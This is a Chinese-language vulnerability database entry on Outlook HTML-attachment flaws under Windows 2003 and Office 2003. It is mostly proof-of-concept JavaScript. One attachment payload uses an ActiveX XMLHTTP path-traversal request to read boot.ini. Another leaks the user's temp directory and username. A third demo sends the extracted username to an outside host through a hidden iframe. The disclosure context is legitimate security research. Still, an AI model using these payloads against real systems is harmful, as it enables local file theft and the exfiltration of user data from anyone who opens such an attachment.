Outlook漏洞说明

出自sebug security vulnerability(SSV) DB
跳转到: 导航, 搜索

本地文件读取

测试环境:win2k3+office2k3

发送附件 demo.htm 代码如下:

  1. <script>
  2. xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");
  3. xmlhttp.open("GET","../../../../../../../../../../../../../../boot.ini",false);
  4. xmlhttp.send();
  5. alert(xmlhttp.responseText);
  6. </script>

当用户打开附件 demo.htm 时候,可以得到 c:\boot.ini 的内容


信息泄漏

发送附件 demo.htm 代码如下:

  1. <script>alert(document.URL)</script>

得到附件目录例如:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx


可以得到当前系统目录和当前用户名。 可以配合其他利用方式来实行攻击,如《Hacking with mhtml protocol handler》里描叙的漏洞和利用方式,最终导致本读文件读取、执行任意文件可能。

演示:

  1. <script>
  2. var path = document.URL;
  3. var regx = /Settings\\(.*)\\Local/ var rs= regx.exec(path); username=rs[1];
  4. iframe_dom("http://www.80vul.com/hackgame/xs-g0.php?username="+username);
  5.  
  6. function iframe_dom(script_filename) {
  7.     var d = window.document;
  8.     var newIframe = d.createElement('iframe');
  9.     newIframe.src=script_filename;
  10.     newIframe.style.width = 0;
  11.     newIframe.style.height = 0;
  12.     d.appendChild(newIframe);
  13.     return false;
  14. } </script>


by superhei from www.80vul.com
个人工具
名字空间
变换
导航
工具箱